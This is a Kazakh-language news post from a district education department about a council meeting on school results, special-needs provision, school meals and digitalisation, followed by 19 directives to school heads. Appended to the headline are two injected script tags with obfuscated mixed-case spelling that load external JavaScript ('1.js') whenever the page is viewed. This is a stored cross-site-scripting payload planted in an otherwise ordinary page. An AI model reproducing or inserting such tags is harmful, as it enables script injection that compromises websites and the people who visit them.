27.01.2022 жылы "Ақмола облысы білім басқармасының Бұланды ауданы бойынша білім бөлімі" ММ-нің басшысы А. Жолдыгулованың төрағалығымен аудандық білім бөлімінің кеңесі өтті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.02.2022

Жиынға білім беру ұйымдарының басшылары, білім бөлімінің әдіскерлері қатысты. "2021-2022 оқу жылының бірінші жартыжылдығының білім сапасының қорытындысы туралы" Алдабергенова Ж.Ж. – аудандық әдістемелік кабинет меңгерушісі бірінші сұрақ бойынша сөз сөйледі. Қосымша баяндамашылар: Кочкина О.П., директордың оқу ісі жөніндегі орынбасары, Каренова А. С. - Макинск қаласының мектеп-лицейі директордың м. а. Екінші сұрақ бойынша:   

"Мектепке дейінгі мекемелерде ЕББҚБ балаларымен жұмыс",  Баитова Г.Р. – білім бөлімінің әдіскері. Қосымша баяндамашылар: Жаксалыкова А.С. - "Балдырған" балабақшасының логопеді, Оспанова Г. М. - "Балдәурен" балабақшасының меңгерушісі. Үшінші сұрақ бойынша: "Түзету сыныптарындағы КББ балаларымен жұмыс" Қаскеева И.Ж. – әдіскер. Қосымша баяндамашылар: Жаркин Д.С. -№1 ЖББОМ директоры. Төртінші сұрақ бойынша: "Жалпы орта білім беру ұйымдарында ыстық тамақпен қамту және ұйымдастыру",– білім бөлімінің әдіскері Э.К. Ковалева сөз сөйледі. Қосымша баяндамашылар: Қуандық С. - Қараөзек ОМ директорының орынбасары, Шакубаева И. В. - Партизанка ОМ директорының м.а. Бесінші сұрақ бойынша: "Білім беру үдерістерін цифрландыру мониторингі"- әдіскер А.А.Тулебаев сөз сөйледі. Қосымша баяндамашылар: Алибеков Т.Б. - Алакөл НМ директоры, Маткенов М. К. - Новодонецк НМ директоры.      

 

Білім беру ұйымдарының басшыларына:

1.      Жоғарыдағы ақпарат назарға алынсын;

2.      Материалды меңгеру сапасына жүйелі бақылау жүргізу, оқу бағдарламасының орындалуын бақылау;

3.      Оқушылардың білімдеріндегі олқылықтарды жою бойынша жұмысты жалғастыру;

4.      Оқушылардың танымдық белсенділігін арттыруға ықпал ететін әдістер мен тәсілдерді енгізу бойынша жұмыс жүргізу;

5.      Бірден үшке дейін "3", бір "4" үлгерімі төмен білім алушылармен жеке жұмысты жалғастыру;

6.      Өткізілген сабақтарды бақылау, сондай-ақ ата-аналармен жұмыс жүргізу (дәлелді себептермен болмау тек ата-ананың өтініші бойынша рұқсат етіледі);

7.      Lesson Study зерттеу бойынша ЖМ жұмысын жалғастыру;

8.      Аудан педагогтері арасында оң тәжірибені тарату бойынша жұмысты жалғастыру;

9.      Арнайы (түзету сыныптарында) білім беру процесін қамтамасыз ету бойынша жұмысты жалғастыру;

10.    "Облыстық психологиялық – медициналық – педагогикалық консультация" КММ, "Макинск қ. №9 психологиялық-педагогикалық түзету кабинеті" КММ-мен бірлескен жұмысты жалғастыру;

11.     2002 жылғы 11 шілдедегі "Мүмкіндігі шектеулі балаларды әлеуметтік, медициналық-педагогикалық түзеу арқылы қолдау туралы" арнайы сыныптардағы жұмыс бойынша нормативтік құжаттарды, 2000 жылғы 10 шілдедегі №708 ҚР арнайы (түзету) білім беру ұйымдарының қызметін ұйымдастыру тәртібі туралы ережелерді, даму мүмкіндігі шектеулі балаларға қатысты мемлекеттік білім беру стандартына ескертпелерді зерделеу;

12.    Бракераж комиссиясының жұмысын күшейту, қамқоршылық кеңес мүшелерін, ата-аналар қауымдастығын қосу;

13.    ҚР БҒМ 24.05.2021 ж. №231 бұйрығымен бекітілген Орта білім беру ұйымдарында білім алушыларды тамақтандыруды ұйымдастыру, сондай-ақ мектепке дейінгі ұйымдарда, жетім балалар мен ата-анасының қамқорлығынсыз қалған балаларға арналған білім беру ұйымдарында тәрбиеленетін және білім алатын балаларды тамақтандыруды қамтамасыз етумен байланысты тауарларды сатып алу қағидаларына (31.10.2018 ж. №598) өзгерістерді мектеп асханаларын жалға алушыларға жеткізу, сондай-ақ осы тармақтарды іске асыру бойынша тиісті Атқарылған жұмыс туралы ақпарат 2022 жылдың 10 ақпанына дейін ұсынылуы керек;

14.    Ерекше білім берілуіне қажеттілігі бар балалар үшін балабақшаларда жағдай жасауды жалғастыру.

15.    Шағын конкурстар ұйымдастыру, ата-аналарды түзету-дамыту жұмыстарына тарту.

16.    Балалардың экспериментіне, проблемалық оқытуға тиісті көңіл бөле отырып, мүмкіндігі шектеулі балалармен инновациялық технологияларды пайдалану бойынша жұмысты жалғастыру.

17.    Күнделіктің уақытылы толтырылуын бақылауды жалғастыру;

18.    Интернет - ресурстардағы барлық тарауларды 31.01.2022 жылға дейін толтыру;

19.    ҰБДҚ- дағы деректерді түзетуді уақтылы жүргізу ұсынылды.

Просмотров: 578


Пікір қосу



Деректерді қолтаңбаға қосу